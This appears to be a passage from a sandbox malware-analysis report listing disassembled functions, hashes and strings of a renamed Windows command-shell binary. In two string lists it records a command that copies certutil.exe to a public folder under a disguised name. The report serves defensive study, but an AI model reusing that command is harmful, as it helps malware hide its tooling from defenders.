                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentFormatMessageThread
                                                                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                      • API String ID: 2411632146-3173542853
                                                                                      • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                      • Instruction ID: 839b4f0b11dd784be5f14a2565ee4eb5a06ecd06e0bc2966d1d6d0ecd16d73fa
                                                                                      • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                      • Instruction Fuzzy Hash: 1C616171A09A4281EAB4EF71A4945B9E3A8FF4CBA8FC40136D94E27758CF3CE5449721
                                                                                      Function 00007FF7937526E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile_open_osfhandle
                                                                                      • String ID: con
                                                                                      • API String ID: 2905481843-4257191772
                                                                                      • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                      • Instruction ID: 589faec6e9053c773e6333113980bd8b711cb5f789490c42646bee0dfe29d1d0
                                                                                      • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                      • Instruction Fuzzy Hash: B571AA326086818AE7B4AF34E480279FAA8FB4DB61F944235DA5E537D4DF3CD545CB20
                                                                                      Function 00007FF7937693E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                      • String ID:
                                                                                      • API String ID: 3829876242-3916222277
                                                                                      • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                      • Instruction ID: f74f4187c6f01b74b919726324bf5bc98042b06e2d1198d26df1afce5a0f0dfb
                                                                                      • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                      • Instruction Fuzzy Hash: 3E619431A04A4286E7A4AB21D49427AF6A9FF8DB59F848134DE0E17395DF3CE504CB61
                                                                                      Function 00007FF793771A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                      • String ID: CSVFS$NTFS$REFS
                                                                                      • API String ID: 3510147486-2605508654
                                                                                      • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                      • Instruction ID: 91249483b74ffcf4af86d94346e5f2d781336aaad279d6af287c32c42c18301c
                                                                                      • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                      • Instruction Fuzzy Hash: 7F612B32704BC28AEBB59F21D8843E9B7A8FB49B86F845135DA0E5B758DF78D204C710
                                                                                      Function 00007FF7937472B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF793747279,?,?,?,?,?,00007FF79374BFA9), ref: 00007FF793764485
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: longjmp
                                                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                      • API String ID: 1832741078-366822981
                                                                                      • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                      • Instruction ID: 9bf00d2e4eb418923c526a1f84d6a5bc99e8d65879ea5d1430770b132ee1de9f
                                                                                      • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                      • Instruction Fuzzy Hash: 23C19120E0CA8291F6F4FB3555E45BE97AAAB4EB88FD00036DD0D77791CF2CA4458362
                                                                                      Function 00007FF79374B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • memset.MSVCRT ref: 00007FF79374BA2B
                                                                                      • wcschr.MSVCRT ref: 00007FF79374BA8A
                                                                                      • wcschr.MSVCRT ref: 00007FF79374BAAA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heapwcschr$AllocProcessmemset
                                                                                      • String ID: -$:.\$=,;$=,;+/[] "
                                                                                      • API String ID: 2872855111-969133440
                                                                                      • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                      • Instruction ID: 3be8d4abf75840f99a6ef8ae85d198db8dd9ea313eea840c8f39716bfc71e715
                                                                                      • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                      • Instruction Fuzzy Hash: 25B1A225A0864281FAF4AB3594C8279A6EAFF4CB84FC54135CA9E67794DF3CF845C720
                                                                                      Function 00007FF79374FC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                      • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                      • API String ID: 1606811317-2340392073
                                                                                      • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                      • Instruction ID: 6a11af5e192d5167642d07bf9d92b74f989022096ea8c97ab3a2c47d625a1273
                                                                                      • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                      • Instruction Fuzzy Hash: 1FD1A121A08A4282F6B4AB35A8C4279A7A9FF49790FC44136DE5D637A5DF3CE506C720
                                                                                      Function 00007FF7937703AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ErrorLast$InformationVolume
                                                                                      • String ID: %04X-%04X$~
                                                                                      • API String ID: 2748242238-2468825380
                                                                                      • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                      • Instruction ID: 223338f66ac182b6fe253580f4344d528b3ec1d2c9ac7d103a6c1a589678a358
                                                                                      • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                      • Instruction Fuzzy Hash: DCA1A562708BC18AEFB5AF30D8902E9B7A9FB89785F804035D94E5BB49DF3CD6058710
                                                                                      Function 00007FF79375662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF793756570,?,?,?,?,?,?,00000000,00007FF793756488), ref: 00007FF793756677
                                                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF793756570,?,?,?,?,?,?,00000000,00007FF793756488), ref: 00007FF79375668F
                                                                                      • _errno.MSVCRT ref: 00007FF7937566A3
                                                                                      • wcstol.MSVCRT ref: 00007FF7937566C4
                                                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF793756570,?,?,?,?,?,?,00000000,00007FF793756488), ref: 00007FF7937566E4
                                                                                      • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF793756570,?,?,?,?,?,?,00000000,00007FF793756488), ref: 00007FF7937566FE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                      • API String ID: 2348642995-441775793
                                                                                      • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                      • Instruction ID: 8a7b0afe89ba8de3bd8f74a272b7afd82099eb980f4560e1c9f783eebba0ff6f
                                                                                      • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                      • Instruction Fuzzy Hash: ED719F62908B46C2E7B86F31D490179F7A8EB4DB85BD4D436DA4E22394EF3CA580C760
                                                                                      Function 00007FF793749400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                      • String ID: FAT$~
                                                                                      • API String ID: 2238823677-1832570214
                                                                                      • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                      • Instruction ID: 8198e4c48b72c774af3f6fc8436c78d9fbe41a1efb4169172e41073dcd264beb
                                                                                      • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                      • Instruction Fuzzy Hash: 82718E32709BC289EBB5AF3198842E9B7A9FB49785F804035DA4D5BB58DF38D2458710
                                                                                      Function 00007FF79374D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D884
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D89D
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D94D
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374D964
                                                                                      • _wcsnicmp.MSVCRT ref: 00007FF79374DB89
                                                                                      • wcstol.MSVCRT ref: 00007FF79374DBDF
                                                                                      • wcstol.MSVCRT ref: 00007FF79374DC63
                                                                                      • memmove.MSVCRT ref: 00007FF79374DD33
                                                                                      • memmove.MSVCRT ref: 00007FF79374DE9A
                                                                                      • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF79374FE2A), ref: 00007FF79374DF1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                      • String ID:
                                                                                      • API String ID: 1051989028-0
                                                                                      • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                      • Instruction ID: fab455fc017ba02eb177592615c39f33e4931f2539932c807144c67c8ef4e253
                                                                                      • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                      • Instruction Fuzzy Hash: DF028532A0879181FBB46F24E488279F6AAFB49B94F944235DADD23795DF3CE441C720
                                                                                      Function 00007FF7937486B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                      • API String ID: 3223794493-3086019870
                                                                                      • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                      • Instruction ID: afb3e2ba6a070dc49637d606d0d72a390e7285dd40e899aa8812a2dadeae865a
                                                                                      • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                      • Instruction Fuzzy Hash: DA51C421A0874286FBA4AB35A8D4179BBA9FF5DB91F844235C91E233A0DF3DE441C770
                                                                                      Function 00007FF793752B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                      • API String ID: 0-3124875276
                                                                                      • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                      • Instruction ID: 473759810da6177eb5e3b99791b3ca0c106f58293dc6519276461d05bca4e262
                                                                                      • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                      • Instruction Fuzzy Hash: 84516120A0C64381FBB8BF35A4D42B9A69DAF4DB46FC04136C60E663A5EF3CA5058771
                                                                                      Function 00007FF79376BFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937558E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF79376C6DB), ref: 00007FF7937558EF
                                                                                        • Part of subcall function 00007FF79375081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79375084E
                                                                                      • towupper.MSVCRT ref: 00007FF79376C1C9
                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79376C31C
                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF79376C5CB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                      • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                      • API String ID: 2242554020-619615743
                                                                                      • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                      • Instruction ID: 5770d6c6104dd53b61e9f910846d888cf562292dd75a5cb9a66430980dd53fab
                                                                                      • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                      • Instruction Fuzzy Hash: 6612B625A08A4381EAB4BB3594A417AB7A8EF4CB94FD40236D95E637E4CF3DE501C721
                                                                                      Function 00007FF793756FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00007FF793757013
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF793757123
